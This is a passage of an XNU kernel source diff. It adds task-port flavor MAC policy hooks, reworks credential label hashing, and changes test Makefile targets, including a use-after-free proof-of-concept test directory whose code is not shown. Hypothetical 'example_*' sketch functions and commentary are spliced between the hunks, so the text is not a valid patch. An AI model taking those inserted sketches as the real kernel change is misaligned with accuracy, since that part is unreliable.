+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned. Suggested failure: EACCES for label mismatch,
+ *  EPERM for lack of privilege, or ESRCH to hide visibility of the target.
+ */
+typedef int mpo_proc_check_get_task_with_flavor_t(
+       kauth_cred_t cred,
+       struct proc_ident *pident,
+       mach_task_flavor_t flavor
+       );
+
 /**
  *  @brief Access control check for exposing a process's task port
  *  @param cred Subject credential
@@ -3513,6 +3574,47 @@ typedef int mpo_proc_check_expose_task_t(
        struct proc_ident *pident
        );
 
+/**
+ *  @brief Access control check for exposing a process's task ports of different flavors
+ *  @param cred Subject credential
+ *  @param pident Object unique process identifier
+ *  @param flavor Requested task port flavor
+ *
+ *  Determine whether the subject identified by the credential can expose
+ *  the passed process's task port of given flavor.
+ *  This call is used by the accessor APIs like processor_set_tasks() and
+ *  processor_set_threads().
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned. Suggested failure: EACCES for label mismatch,
+ *  EPERM for lack of privilege, or ESRCH to hide visibility of the target.
+ */
+typedef int mpo_proc_check_expose_task_with_flavor_t(
+       kauth_cred_t cred,
+       struct proc_ident *pident,
+       mach_task_flavor_t flavor
+       );
+
+/**
+ *  @brief Access control check for upgrading to task port with a task identity token
+ *  @param cred Subject credential
+ *  @param pident Object unique process identifier
+ *  @param flavor Requested task port flavor
+ *
+ *  Determine whether the subject identified by the credential can upgrade to task port
+ *  of given flavor with a task identity token of the passed process.
+ *  This call is used by task_identity_token_get_task_port().
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned. Suggested failure: EACCES for label mismatch,
+ *  EPERM for lack of privilege, or ESRCH to hide visibility of the target.
+ */
+typedef int mpo_proc_check_task_id_token_get_task_t(
+       kauth_cred_t cred,
+       struct proc_ident *pident,
+       mach_task_flavor_t flavor
+       );
+
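
A hedged sketch of where this hook sits: a task_identity_token_get_task_port()-style conversion would look up the task behind the token and ask the policies whether the caller may be upgraded to a port of the requested flavor. example_token_upgrade_allowed is hypothetical; only the MAC entry point added by this change is assumed:

static kern_return_t
example_token_upgrade_allowed(task_t task, mach_task_flavor_t flavor)
{
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
        }
        /* Ask the registered policies whether the upgrade is permitted. */
        if (mac_task_check_task_id_token_get_task(task, flavor) != 0) {
                return KERN_DENIED;
        }
        return KERN_SUCCESS;
}
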
 /**
  *  @brief Check whether task's IPC may inherit across process exec
  *  @param p current process instance
@@ -5342,7 +5444,7 @@ typedef void mpo_reserved_hook_t(void);
  * Please note that this should be kept in sync with the check assumptions
  * policy in bsd/kern/policy_check.c (policy_ops struct).
  */
-#define MAC_POLICY_OPS_VERSION 69 /* inc when new reserved slots are taken */
+#define MAC_POLICY_OPS_VERSION 74 /* inc when new reserved slots are taken */
 struct mac_policy_ops {
        mpo_audit_check_postselect_t            *mpo_audit_check_postselect;
        mpo_audit_check_preselect_t             *mpo_audit_check_preselect;
@@ -5450,9 +5552,9 @@ struct mac_policy_ops {
        mpo_mount_label_init_t                  *mpo_mount_label_init;
        mpo_mount_label_internalize_t           *mpo_mount_label_internalize;
 
-       mpo_reserved_hook_t                     *mpo_reserved38;
-       mpo_reserved_hook_t                     *mpo_reserved39;
-       mpo_reserved_hook_t                     *mpo_reserved40;
+       mpo_proc_check_expose_task_with_flavor_t *mpo_proc_check_expose_task_with_flavor;
+       mpo_proc_check_get_task_with_flavor_t   *mpo_proc_check_get_task_with_flavor;
+       mpo_proc_check_task_id_token_get_task_t *mpo_proc_check_task_id_token_get_task;
 
        mpo_pipe_check_ioctl_t                  *mpo_pipe_check_ioctl;
        mpo_pipe_check_kqfilter_t               *mpo_pipe_check_kqfilter;
@@ -5481,7 +5583,7 @@ struct mac_policy_ops {
        mpo_proc_notify_exec_complete_t         *mpo_proc_notify_exec_complete;
        mpo_proc_notify_cs_invalidated_t        *mpo_proc_notify_cs_invalidated;
        mpo_proc_check_syscall_unix_t           *mpo_proc_check_syscall_unix;
-       mpo_proc_check_expose_task_t            *mpo_proc_check_expose_task;
+       mpo_proc_check_expose_task_t            *mpo_proc_check_expose_task;            /* Deprecating, use mpo_proc_check_expose_task_with_flavor instead */
        mpo_proc_check_set_host_special_port_t  *mpo_proc_check_set_host_special_port;
        mpo_proc_check_set_host_exception_port_t *mpo_proc_check_set_host_exception_port;
        mpo_exc_action_check_exception_send_t   *mpo_exc_action_check_exception_send;
@@ -5518,8 +5620,8 @@ struct mac_policy_ops {
 
        mpo_proc_check_debug_t                  *mpo_proc_check_debug;
        mpo_proc_check_fork_t                   *mpo_proc_check_fork;
-       mpo_proc_check_get_task_name_t          *mpo_proc_check_get_task_name;
-       mpo_proc_check_get_task_t               *mpo_proc_check_get_task;
+       mpo_proc_check_get_task_name_t          *mpo_proc_check_get_task_name; /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */
+       mpo_proc_check_get_task_t               *mpo_proc_check_get_task;      /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */
        mpo_proc_check_getaudit_t               *mpo_proc_check_getaudit;
        mpo_proc_check_getauid_t                *mpo_proc_check_getauid;
        mpo_proc_check_getlcid_t                *mpo_proc_check_getlcid;
@@ -5550,8 +5652,8 @@ struct mac_policy_ops {
        mpo_socket_check_setsockopt_t           *mpo_socket_check_setsockopt;
        mpo_socket_check_getsockopt_t           *mpo_socket_check_getsockopt;
 
-       mpo_reserved_hook_t                     *mpo_reserved50;
-       mpo_reserved_hook_t                     *mpo_reserved51;
+       mpo_proc_check_get_movable_control_port_t *mpo_proc_check_get_movable_control_port;
+       mpo_proc_check_dyld_process_info_notify_register_t *mpo_proc_check_dyld_process_info_notify_register;
        mpo_reserved_hook_t                     *mpo_reserved52;
        mpo_reserved_hook_t                     *mpo_reserved53;
        mpo_reserved_hook_t                     *mpo_reserved54;
@@ -5562,7 +5664,8 @@ struct mac_policy_ops {
        mpo_reserved_hook_t                     *mpo_reserved59;
        mpo_reserved_hook_t                     *mpo_reserved60;
        mpo_reserved_hook_t                     *mpo_reserved61;
-       mpo_reserved_hook_t                     *mpo_reserved62;
+
+       mpo_iokit_check_open_service_t          *mpo_iokit_check_open_service;
 
        mpo_system_check_acct_t                 *mpo_system_check_acct;
        mpo_system_check_audit_t                *mpo_system_check_audit;
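
For orientation, a hedged sketch of a policy module adopting two of the newly assigned slots. All example_* names are hypothetical, and registration through mac_policy_register() with a struct mac_policy_conf is elided:

static int
example_proc_check_get_task_with_flavor(kauth_cred_t cred __unused,
    struct proc_ident *pident __unused, mach_task_flavor_t flavor)
{
        /* Permit the read-only flavors; deny control ports from this policy. */
        return (flavor == TASK_FLAVOR_CONTROL) ? EPERM : 0;
}

static int
example_proc_check_get_movable_control_port(kauth_cred_t cred __unused)
{
        return 0;       /* no additional restriction in this sketch */
}

static struct mac_policy_ops example_policy_ops = {
        .mpo_proc_check_get_task_with_flavor =
            example_proc_check_get_task_with_flavor,
        .mpo_proc_check_get_movable_control_port =
            example_proc_check_get_movable_control_port,
};
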
index 3bcb1cba5b61398b7a8460752f048aedcc3a2553..09aa47db290788a46c3d56279695ee15c28dc9d7 100644 (file)
@@ -75,6 +75,8 @@
 #include <mach/mach_types.h>
 #include <kern/task.h>
 
+#include <os/hash.h>
+
 #include <security/mac_internal.h>
 #include <security/mac_mach_internal.h>
 
@@ -106,10 +108,38 @@ mac_cred_label_free(struct label *label)
        mac_labelzone_free(label);
 }
 
-int
-mac_cred_label_compare(struct label *a, struct label *b)
+bool
+mac_cred_label_is_equal(const struct label *a, const struct label *b)
+{
+       if (a->l_flags != b->l_flags) {
+               return false;
+       }
+       for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) {
+               const void *pa = a->l_perpolicy[slot].l_ptr;
+               const void *pb = b->l_perpolicy[slot].l_ptr;
+
+               if (pa != pb) {
+                       return false;
+               }
+       }
+       return true;
+}
+
+uint32_t
+mac_cred_label_hash_update(const struct label *a, uint32_t hash)
 {
-       return bcmp(a, b, sizeof(*a)) == 0;
+       hash = os_hash_jenkins_update(&a->l_flags,
+           sizeof(a->l_flags), hash);
+#if __has_feature(ptrauth_calls)
+       for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) {
+               const void *ptr = a->l_perpolicy[slot].l_ptr;
+               hash = os_hash_jenkins_update(&ptr, sizeof(ptr), hash);
+       }
+#else
+       hash = os_hash_jenkins_update(&a->l_perpolicy,
+           sizeof(a->l_perpolicy), hash);
+#endif
+       return hash;
 }
 
 int
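
A hedged sketch of the invariant the new pair is meant to uphold for credential de-duplication: labels that compare equal must hash identically, while a hash collision alone proves nothing. example_labels_collide is a hypothetical helper; the two functions it calls are the ones introduced above:

static bool
example_labels_collide(const struct label *a, const struct label *b,
    uint32_t seed)
{
        uint32_t ha = mac_cred_label_hash_update(a, seed);
        uint32_t hb = mac_cred_label_hash_update(b, seed);

        if (mac_cred_label_is_equal(a, b)) {
                assert(ha == hb);       /* equal labels hash equally */
                return true;
        }
        return ha == hb;                /* distinct labels may still collide */
}
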
@@ -410,31 +440,48 @@ mac_proc_check_fork(proc_t curp)
 }
 
 int
-mac_proc_check_get_task_name(struct ucred *cred, proc_ident_t pident)
+mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor)
 {
        int error;
 
-       MAC_CHECK(proc_check_get_task_name, cred, pident);
+       assert(flavor <= TASK_FLAVOR_NAME);
 
-       return error;
-}
+       /* Also call the old hook for compatibility, deprecating in rdar://66356944. */
+       if (flavor == TASK_FLAVOR_CONTROL) {
+               MAC_CHECK(proc_check_get_task, cred, pident);
+               if (error) {
+                       return error;
+               }
+       }
 
-int
-mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident)
-{
-       int error;
+       if (flavor == TASK_FLAVOR_NAME) {
+               MAC_CHECK(proc_check_get_task_name, cred, pident);
+               if (error) {
+                       return error;
+               }
+       }
 
-       MAC_CHECK(proc_check_get_task, cred, pident);
+       MAC_CHECK(proc_check_get_task_with_flavor, cred, pident, flavor);
 
        return error;
 }
 
 int
-mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident)
+mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor)
 {
        int error;
 
-       MAC_CHECK(proc_check_expose_task, cred, pident);
+       assert(flavor <= TASK_FLAVOR_NAME);
+
+       /* Also call the old hook for compatibility, deprecating in rdar://66356944. */
+       if (flavor == TASK_FLAVOR_CONTROL) {
+               MAC_CHECK(proc_check_expose_task, cred, pident);
+               if (error) {
+                       return error;
+               }
+       }
+
+       MAC_CHECK(proc_check_expose_task_with_flavor, cred, pident, flavor);
 
        return error;
 }
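
A hedged sketch of how the task_*_for_pid() family might drive the flavored entry point above; the flavor mapping and example_check_port_request are assumptions, not copied from the actual call sites:

static int
example_check_port_request(kauth_cred_t cred, proc_ident_t pident,
    bool name_port_only)
{
        mach_task_flavor_t flavor = name_port_only ?
            TASK_FLAVOR_NAME : TASK_FLAVOR_CONTROL;

        /*
         * mac_proc_check_get_task() above still fires the legacy
         * proc_check_get_task / proc_check_get_task_name hooks for the
         * matching flavor before consulting proc_check_get_task_with_flavor.
         */
        return mac_proc_check_get_task(cred, pident, flavor);
}
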
index 71a3e46a27bb929d6ccb157920922142056b56d0..c9d3909bbf0ced971141422bcd418e2aee43f4a4 100644 (file)
@@ -74,18 +74,33 @@ install-sr_entitlement_helper: sr_entitlement_helper
 
 sr_entitlement: OTHER_LDFLAGS += -ldarwintest_utils
 
+restrict_jit: CODE_SIGN_ENTITLEMENTS = restrict_jit.entitlements
+
 backtracing: OTHER_LDFLAGS += -framework CoreSymbolication
 backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist
 
 data_protection: OTHER_LDFLAGS += -ldarwintest_utils -framework IOKit
 
+CUSTOM_TARGETS += immovable_send_client vm_spawn_tool
+
+exception_tests: excserver exc_helpers.c
+exception_tests: CODE_SIGN_ENTITLEMENTS = exception_tests.entitlements
+exception_tests: OTHER_CFLAGS += $(OBJROOT)/excserver.c
+exception_tests: OTHER_CFLAGS += -I $(OBJROOT)
+exception_tests: OTHER_CFLAGS += -DENTITLED=1
+
 immovable_send: excserver
 immovable_send: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT)
 immovable_send: OTHER_LDFLAGS += -ldarwintest_utils -lpthread -framework IOKit
-
-CUSTOM_TARGETS += immovable_send_client vm_spawn_tool inspect_port_nocodesign
 immovable_send: immovable_send_client
 
+immovable_send_client: immovable_send_client.c
+       $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client
+
+install-immovable_send_client: immovable_send_client
+       mkdir -p $(INSTALLDIR)
+       cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/
+
 vm_spawn_tool: INVALID_ARCHS = i386
 vm_spawn_tool: vm_spawn_tool.c
        $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) vm_spawn_tool.c -o $(SYMROOT)/vm_spawn_tool
@@ -94,27 +109,30 @@ install-vm_spawn_tool: vm_spawn_tool
        mkdir -p $(INSTALLDIR)/tools
        cp $(SYMROOT)/vm_spawn_tool $(INSTALLDIR)/tools/
 
-immovable_send_client: immovable_send_client.c
-       $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client
+CUSTOM_TARGETS += imm_pinned_control_port_crasher
 
-install-immovable_send_client: immovable_send_client
-       mkdir -p $(INSTALLDIR)
-       cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/
+imm_pinned_control_port: excserver
+imm_pinned_control_port: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist
+imm_pinned_control_port: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT)
+imm_pinned_control_port: OTHER_LDFLAGS += -ldarwintest_utils -lpthread
+imm_pinned_control_port: imm_pinned_control_port_crasher
 
-inspect_port_nocodesign: inspect_port.c
-       $(CC) $(DT_CFLAGS) -I $(OBJROOT) -DT_NOCODESIGN=1 $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $^ -o $(SYMROOT)/inspect_port_nocodesign
-
-install-inspect_port_nocodesign: inspect_port_nocodesign
+imm_pinned_control_port_crasher: imm_pinned_control_port_crasher.c
+       $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) imm_pinned_control_port_crasher.c -o $(SYMROOT)/imm_pinned_control_port_crasher
+       $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@
+       
+install-imm_pinned_control_port_crasher: imm_pinned_control_port_crasher
        mkdir -p $(INSTALLDIR)
-       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN_ALLOCATE) -r  -i $(SYMROOT)/inspect_port_nocodesign -o $(SYMROOT)/inspect_port_nocodesign
+       cp $(SYMROOT)/imm_pinned_control_port_crasher $(INSTALLDIR)/
 
 kas_info: OTHER_LDFLAGS += -framework CoreSymbolication
 kas_info: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist
 
 kdebug: INVALID_ARCHS = i386
 kdebug: OTHER_LDFLAGS = -framework ktrace -ldarwintest_utils -framework kperf
+kdebug: OTHER_CFLAGS += test_utils.c
 
-EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c in_cksum.c
+EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c in_cksum.c test_utils.c
 
 ifneq ($(PLATFORM),iPhoneOS)
 EXCLUDED_SOURCES += jumbo_va_spaces_28530648.c perf_compressor.c memorystatus_freeze_test.c vm/entitlement_increased_memory_limit.c
@@ -131,6 +149,8 @@ memorystatus_freeze_test: OTHER_CFLAGS += -ldarwintest_utils memorystatus_assert
 memorystatus_is_assertion: OTHER_LDFLAGS += -ldarwintest_utils
 memorystatus_is_assertion: OTHER_CFLAGS += memorystatus_assertion_helpers.c
 
+memorystatus_vm_map_fork: OTHER_CFLAGS += test_utils.c
+
 shared_cache_tests: OTHER_LDFLAGS += -ldarwintest_utils
 
 stackshot_tests: OTHER_CFLAGS += -Wno-objc-messaging-id
@@ -179,6 +199,17 @@ kperf_backtracing: OTHER_LDFLAGS += -framework kperf -framework kperfdata -frame
 kperf_backtracing: OTHER_LDFLAGS += -framework CoreSymbolication
 kperf_backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist
 
+text_corruption: OTHER_LDFLAGS += -ldarwintest_utils
+CUSTOM_TARGETS += text_corruption_helper
+
+text_corruption_helper:
+       $(CC) $(LDFLAGS) $(CFLAGS) text_corruption_helper.c -lm -o $(SYMROOT)/$@;
+       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@;
+
+install-text_corruption_helper:
+       mkdir -p $(INSTALLDIR)
+       cp $(SYMROOT)/text_corruption_helper $(INSTALLDIR)/
+
 kevent_qos: OTHER_CFLAGS += -Wno-unused-macros
 kevent_qos: OTHER_CFLAGS += -I $(OBJROOT)/
 
@@ -252,11 +283,12 @@ osptr_17: osptr_compat.cpp
        $(CXX) $(DT_CXXFLAGS) $(OTHER_CXXFLAGS) $(CXXFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
 
 priority_queue: OTHER_CXXFLAGS += -std=c++17
+zalloc_buddy: OTHER_CFLAGS += -Wno-format-pedantic
 
 os_refcnt: OTHER_CFLAGS += -I$(SRCROOT)/../libkern/ -Wno-gcc-compat -Wno-undef -O3 -flto
 
-task_inspect: CODE_SIGN_ENTITLEMENTS = task_inspect.entitlements
-task_inspect: OTHER_CFLAGS += -DENTITLED=1
+kernel_inspection: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
+kernel_inspection: OTHER_CFLAGS += -DENTITLED=1
 
 turnstile_multihop: OTHER_CFLAGS += -Wno-unused-macros
 turnstile_multihop: OTHER_CFLAGS += -I $(OBJROOT)/
@@ -286,8 +318,6 @@ $(DSTROOT)/usr/local/bin/kcdata: $(SRCROOT)/../tools/lldbmacros/kcdata.py
 
 xnu_quick_test: OTHER_CFLAGS += xnu_quick_test_helpers.c
 
-xnu_quick_test_entitled: CODE_SIGN_ENTITLEMENTS = xnu_quick_test.entitlements
-
 CUSTOM_TARGETS += vm_set_max_addr_helper
 
 vm_set_max_addr_helper: vm_set_max_addr_helper.c
@@ -377,7 +407,7 @@ endif
 
 task_info_28439149: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
 
-inspect_port: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
+read_inspect: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
 
 proc_info: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
 proc_info: OTHER_LDFLAGS += -ldarwintest_utils
@@ -407,6 +437,9 @@ settimeofday_29193041_entitled: OTHER_CFLAGS += drop_priv.c
 thread_group_set_32261625: OTHER_LDFLAGS = -framework ktrace
 
 task_info: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist
+task_info: OTHER_CFLAGS += test_utils.c
+
+extract_right_soft_fail: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist
 
 ifneq ($(PLATFORM),iPhoneOS)
        EXCLUDED_SOURCES += task_vm_info_decompressions.c
@@ -496,6 +529,7 @@ debug_control_port_for_pid: CODE_SIGN_ENTITLEMENTS = ./debug_control_port_for_pi
 prng: OTHER_LDFLAGS += -ldarwintest_utils
 
 preoslog: OTHER_LDFLAGS += -ldarwintest_utils
+preoslog: OTHER_CFLAGS += test_utils.c
 
 task_policy: CODE_SIGN_ENTITLEMENTS = ./task_policy_entitlement.plist
 
@@ -560,12 +594,14 @@ ifeq ($(PLATFORM),MacOSX)
 EXCLUDED_SOURCES += vm/kern_max_task_pmem.c
 endif
 
-EXCLUDED_SOURCES += vm/perf_helpers.c
+EXCLUDED_SOURCES += benchmark/helpers.c
+
+perf_vmfault: OTHER_CFLAGS += benchmark/helpers.c
 
 fault_throughput: vm/fault_throughput.c
        mkdir -p $(SYMROOT)/vm
        $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@
-fault_throughput: OTHER_CFLAGS += vm/perf_helpers.c
+fault_throughput: OTHER_CFLAGS += benchmark/helpers.c
 
 install-fault_throughput: fault_throughput
        mkdir -p $(INSTALLDIR)/vm
@@ -589,7 +625,7 @@ EXCLUDED_SOURCES += vm/fault_throughput.plist vm/fault_throughput.c
 perf_madvise: vm/perf_madvise.c
        mkdir -p $(SYMROOT)/vm
        $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@
-perf_madvise: OTHER_CFLAGS += vm/perf_helpers.c
+perf_madvise: OTHER_CFLAGS += benchmark/helpers.c
 install-perf_madvise: perf_madvise
        mkdir -p $(INSTALLDIR)/vm
        cp $(SYMROOT)/vm/perf_madvise $(INSTALLDIR)/vm/
@@ -612,13 +648,6 @@ task_create_suid_cred_unentitled: OTHER_CFLAGS += -DUNENTITLED
 task_create_suid_cred_unentitled: task_create_suid_cred.c
        $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
 
-ifeq ($(PLATFORM),MacOSX)
-test_dext_launch_56101852: OTHER_LDFLAGS += -framework CoreFoundation -framework IOKit
-test_dext_launch_56101852: CODE_SIGN_ENTITLEMENTS += test_dext_launch_56101852.entitlements
-else
-EXCLUDED_SOURCES += test_dext_launch_56101852.c
-endif
-
 ioconnectasyncmethod_57641955: OTHER_LDFLAGS += -framework IOKit
 
 ifeq ($(PLATFORM),BridgeOS)
@@ -630,4 +659,52 @@ endif
 
 test_sysctl_kern_procargs_25397314: OTHER_LDFLAGS += -framework Foundation -ldarwintest_utils
 
+INCLUDED_TEST_SOURCE_DIRS += counter
+
+EXCLUDED_SOURCES += counter/common.c
+counter/counter: OTHER_CFLAGS += counter/common.c test_utils.c
+counter/counter: OTHER_LDFLAGS += -ldarwintest_utils -ldarwintest
+
+counter/benchmark: counter/benchmark.c
+       mkdir -p $(SYMROOT)/counter
+       $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
+       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@;
+
+counter/benchmark: OTHER_CFLAGS += counter/common.c benchmark/helpers.c
+
+install-counter/benchmark: counter/benchmark
+       mkdir -p $(INSTALLDIR)/counter
+       cp $(SYMROOT)/counter/benchmark $(INSTALLDIR)/counter/
+
+counter/benchmark_benchrun:
+       mkdir -p $(SYMROOT)/counter
+       cp $(SRCROOT)/counter/benchmark.lua $(SYMROOT)/counter/benchmark.lua
+       chmod +x $(SYMROOT)/counter/benchmark.lua
+
+install-counter/benchmark_benchrun: counter/benchmark_benchrun
+       mkdir -p $(INSTALLDIR)/counter
+       cp $(SYMROOT)/counter/benchmark.lua $(INSTALLDIR)/counter/
+       chmod +x $(INSTALLDIR)/counter/benchmark.lua
+
+CUSTOM_TARGETS += counter/benchmark counter/benchmark_benchrun
+EXCLUDED_SOURCES += counter/benchmark.c
+
+ifneq ($(PLATFORM),MacOSX)
+EXCLUDED_SOURCES += vm/page_size_globals.c
+else
+vm/page_size_globals: INVALID_ARCHS = arm64 arm64e
+endif
+
+INCLUDED_TEST_SOURCE_DIRS += lockf_uaf_poc
+
 include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets
+
+trial_experiments: CODE_SIGN_ENTITLEMENTS = trial_experiments.entitlements
+trial_experiments: OTHER_CFLAGS += -DENTITLED=1 test_utils.c drop_priv.c
+trial_experiments: trial_experiments.c
+       $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
+       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none --entitlements $(CODE_SIGN_ENTITLEMENTS) $(SYMROOT)/$@;
+
+trial_experiments_unentitled: OTHER_CFLAGS += drop_priv.c test_utils.c
+trial_experiments_unentitled: trial_experiments.c
+       $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
index 30235c37b5dc1a363050cb942d07ba90550d6e6f..329f7f7f66c7ac27f82f7d1c87f3cb3ae8014e9c 100644 (file)
@@ -3,6 +3,8 @@
 #include <mach/mach_error.h>
 #include <mach/mach_host.h>
 
+#include "drop_priv.h"
+
 T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging"));
 
 /*
@@ -11,8 +13,6 @@ T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging"));
  */
 #define LIBTRACE_PRIVATE_DATA  0x01000000
 
-extern void drop_priv(void);
-
 static bool _needs_reset;
 static uint32_t _original;
 
diff --git a/tests/benchmark/helpers.c b/tests/benchmark/helpers.c
new file mode 100644 (file)
index 0000000..37ed766
--- /dev/null
@@ -0,0 +1,84 @@
+#include <assert.h>
+#include <errno.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/sysctl.h>
+
+#include <sys/mman.h>
+
+#include "benchmark/helpers.h"
+
+#define K_CTIME_BUFFER_LEN  26
+void
+benchmark_log(bool verbose, const char *restrict fmt, ...)
+{
+       time_t now;
+       char time_buffer[K_CTIME_BUFFER_LEN];
+       struct tm local_time;
+       va_list args;
+       if (verbose) {
+               strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN);
+
+               now = time(NULL);
+               if (now != -1) {
+                       struct tm* ret = localtime_r(&now, &local_time);
+                       if (ret == &local_time) {
+                               snprintf(time_buffer, K_CTIME_BUFFER_LEN,
+                                   "%.2d/%.2d/%.2d %.2d:%.2d:%.2d",
+                                   local_time.tm_mon + 1, local_time.tm_mday,
+                                   local_time.tm_year + 1900,
+                                   local_time.tm_hour, local_time.tm_min,
+                                   local_time.tm_sec);
+                       }
+               }
+
+               printf("%s: ", time_buffer);
+               va_start(args, fmt);
+               vprintf(fmt, args);
+               fflush(stdout);
+       }
+}
+
+uint64_t
+timespec_difference_us(const struct timespec* a, const struct timespec* b)
+{
+       assert(a->tv_sec > b->tv_sec || (a->tv_sec == b->tv_sec && a->tv_nsec >= b->tv_nsec));
+       long seconds_elapsed = a->tv_sec - b->tv_sec;
+       uint64_t nsec_elapsed;
+       if (b->tv_nsec > a->tv_nsec) {
+               seconds_elapsed--;
+               nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec);
+       } else {
+               nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec);
+       }
+       return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond;
+}
+
+unsigned char *
+mmap_buffer(size_t memsize)
+{
+       int fd = -1;
+       unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE,
+           fd, 0);
+       if ((void*) addr == MAP_FAILED) {
+               fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno));
+               exit(2);
+       }
+       return addr;
+}
+
+int
+get_ncpu(void)
+{
+       int ncpu;
+       size_t length = sizeof(ncpu);
+
+       int ret = sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0);
+       if (ret == -1) {
+               fprintf(stderr, "failed to query hw.ncpu");
+               exit(1);
+       }
+       return ncpu;
+}
diff --git a/tests/benchmark/helpers.h b/tests/benchmark/helpers.h
new file mode 100644 (file)
index 0000000..12746bc
--- /dev/null
@@ -0,0 +1,38 @@
+#ifndef BENCHMARK_PERF_HELPERS_H
+#define BENCHMARK_PERF_HELPERS_H
+
+/*
+ * Utility functions and constants used by perf tests.
+ */
+#include <inttypes.h>
+#include <time.h>
+#include <stdbool.h>
+
+/*
+ * mmap an anonymous chunk of memory.
+ */
+unsigned char *mmap_buffer(size_t size);
+/*
+ * Returns a - b in microseconds.
+ * NB: a must be >= b
+ */
+uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b);
+/*
+ * Print the message to stdout along with the current time.
+ * Also flushes stdout so that the log can help detect hangs. Don't call
+ * this function from within the measured portion of the benchmark as it will
+ * pollute your measurement.
+ *
+ * NB: Will only log if verbose == true.
+ */
+void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3)));
+
+static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000;
+static const uint64_t kNumNanosecondsInMicrosecond = 1000UL;
